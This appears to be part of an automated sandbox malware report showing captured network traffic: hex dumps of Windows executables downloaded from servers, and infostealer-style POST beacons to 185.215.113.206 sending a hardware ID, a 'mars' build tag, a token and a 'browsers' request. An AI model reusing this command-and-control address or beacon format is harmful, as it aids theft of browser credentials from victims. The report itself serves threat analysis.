00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 11:08:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 25 Nov 2024 11:09:00 GMTContent-Type: application/octet-streamContent-Length: 1910272Last-Modified: Mon, 25 Nov 2024 10:44:21 GMTConnection: keep-aliveETag: "67445505-1d2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 48 6c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 e7 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 e6 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6d 7a 6d 66 6b 66 63 00 10 1a 00 00 e0 31 00 00 08 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 71 67 76 64 66 6b 78 00 10 00 00 00 f0 4b 00 00 06 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4c 00 00 22 00 00 00 04 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 25 Nov 2024 11:10:10 GMTContent-Type: application/octet-streamContent-Length: 1873408Last-Modified: Mon, 25 Nov 2024 10:24:30 GMTConnection: keep-aliveETag: "6744505e-1c9600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c0 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 c7 42 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6a 78 68 67 65 65 64 00 00 1a 00 00 20 30 00 00 f6 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 63 64 69 6a 78 71 62 00 10 00 00 00 20 4a 00 00 06 00 00 00 6e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 74 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 25 Nov 2024 11:10:18 GMTContent-Type: application/octet-streamContent-Length: 4425728Last-Modified: Mon, 25 Nov 2024 09:38:20 GMTConnection: keep-aliveETag: "6744458c-438800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 c0 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c5 00 00 04 00 00 11 c9 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 a3 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 6e 76 7a 71 74 64 00 e0 1b 00 00 d0 a9 00 00 d6 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 67 6a 6f 78 78 7a 61 00 10 00 00 00 b0 c5 00 00 04 00 00 00 62 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 c5 00 00 22 00 00 00 66 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGDHCFCAAECAKECBAFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 35 34 44 39 41 45 41 46 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 2d 2d 0d 0a Data Ascii: ------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="hwid"D554D9AEAF294266498721------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="build"mars------JKEGDHCFCAAECAKECBAF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 2d 2d 0d 0a Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="message"browsers------JKJDBAAAEHIEGCAKFHCG--
